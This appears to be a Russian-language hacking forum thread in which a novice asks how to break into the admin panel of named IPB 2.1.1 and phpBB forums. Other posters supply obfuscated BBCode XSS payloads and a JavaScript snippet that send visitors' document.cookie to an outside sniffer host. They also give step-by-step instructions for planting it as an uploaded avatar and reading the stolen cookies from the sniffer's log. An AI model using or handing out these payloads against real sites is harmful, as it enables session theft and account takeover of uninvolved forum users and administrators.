|
Ipb 2.1.1
Кто может четко и внятно разъяснить мне неопытному как проникнуть в админку или взломать этот форум IPB 2.1.1, только поочереди что и как нужно делать.
Заранее спасибо ;)) на примере возьмите http://steeld.ru/forum/index.php |
Ну форум пропачен, с эксплоитом не доберёшся, а Xss тама активна.
|
Ну а можно вообще сказать как юзать(взламавыть)
ipb версии 2.1.1?? Типа какая уязвимсоть -как ее использовать! И дайте пожалуста ссылку на эксплойт для версии 2.1.1 -если он конечно есть?? |
Код HTML:
[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]] |
Да ну ты и поставил зачиту от дураков... Не чего не получанется.
|
У а как на счет этого http://lilania.ru/board/
На старом хосте сидели я их ломанул а щас чет немогу. |
звёздочки поубирай
|
Цитата:
|
Цитата:
|
Цитата:
|
Да в коде котором поставил ghostwizard.Не ужели так трудно понять.
|
Цитата:
|
Цитата:
www.lilania.ru |
Привильно ЯЯЯ =)))
|
Цитата:
можите что нить подсказать? |
Да, должна помочь. Твой форум на phpBB. Используй поиск и не флудь темку про IPB.
|
Dimazzz да ясно, что это phpbb=))) пробуй xss для phpbb 2.0.15 >
и хорош флудить тута-)) |
И еще один момент дайте сслылку на снифер ))
|
Цитата:
|
В каком смысле?=)))
http://antichat.ru/sniff/ - вот сюда зайди там всё расписано=) репу мне!=)) я помог) Цитата:
код сниффера для phpbb 2.0.18: Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]репу мнееее=))) СОРРИ ЗА ФЛУД! Просто я помогаю парню=) |
http://antichat.ru/sniff/ + Перечитай мой предидущий пост.
|
Я вот что то непойму ))
вот в этой статье: http://forum.antichat.ru/showthread.php?t=9910 <body onloаd="javаscript:document.locatiоn.replаce(' http://www.АДРЕС_ЯКОБЫ_ВЗЛОМАННОГО_ АЙТА.narod.ru/index.htm')"> <script language="JavаScript"> img = nеw Imаge(); img.srс = "http://АДРЕС_СНИФЕРА.ru/snifer.php?"+document.cookie; </script> адрес якобы взломанного сайта - это должен быть сайт который я на народе создал??? адрес снифера?? - что туда нужно записать |
оооооооооооооооо боже.....
|
мдя ... ну что поделать
я вот непойму какой адрес снифера написать??? Кто поможет напишите эту строчку правильно )) |
И Я И Azazel УЖЕ ТЕБЕ ГОВОРИЛИ!!!! ЗАЙДИ НА http://antichat.ru/sniff/
ну если после этого не поймешь, что нужно в "адрес снифера" писать, то я не знаю...... напиши там http://antichat.ru/cgi-bin/s.jpg? и потом иди смотреть лог сниффера по адресу http://antichat.ru/sniff/log.php что не понятно???? |
img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
|
<body onloаd="javаscript:document.locatiоn.replаce(' http://www.АДРЕС_ЯКОБЫ_ВЗЛОМАННОГО_ АЙТА.narod.ru/index.htm')">
<script language="JavаScript"> img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg/snifer.php?"+document.cookie; </script> мля ... но недоганю млин , так чтоль )) ну этож неправильно вроде, напишите как нуно. |
Цитата:
Так буду дальше мучаться :)) |
хм ... сохранил я этот код и переменовал в .gif но на сате ругается и не загружает мой аватар??? В чем тут ошибка??
|
Делай так:
Открывай блокнот. Забивай туда <script>img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Нажимай "сохранить как" и сохраняй как avatar.jpg. Теперь загружай на форум её, и делай что хотел делать. И не забудь + к моей репе =)) |
Бля не меняей нечего , как тебе сказали так и делай , так трудна чтоли, вот всё как есть как тебе изложили так и делай всё.
|
Чета все сделал как наптсано в той статье и ни какого эффекта ((
Если есть у кого нить эта аватарка и 2 html файла скиньте пожадуйста |
или дайте мыло я скину эти файлы а вы проверите все правильно я сделал или нет ;) этож не так сложно.
|
|
Цитата:
И может кто нить скинет мне мыло готовые эти файлы?? pro100diavolenok@xaker.ru |
Dimazzz по-моему в статье ЯСНО написано, что да как! Если не получается, то пробуй сначала, ещё раз почитай. НО там всё написано! Вопросов быть не должно.
censored!'у респект! Он объяснил так, что не понять не может просто никто! Это пошаговая инструкция....=) |
Инструкция то пошаговая, просто может я в чем та ошибся и невижу этого ((
Если у тебя есть все это можеш мне скинуть?? |
У тебя сайт на народе есть? Если есть, то ДЕЛАЙ ВСЁ КАК В СТАТЬЕ!!! ТАМ И ТАК ВСЕ ГОТОВОЕ!!!!
зы совет: создай для этого обсуждения новую тему, т.к. это уже идет полнейший флуд и не имеет ни какого отношения к форумам Ipb 2.1.1. |
Цитата:
Тема закрыта из-за невнимания автора к ответам на его вопросы. |
Короче смотри видео есть. phpnuke от Мишки. Найдешь в разделе видео. В ипб аналогично.
|
| Время: 13:16 |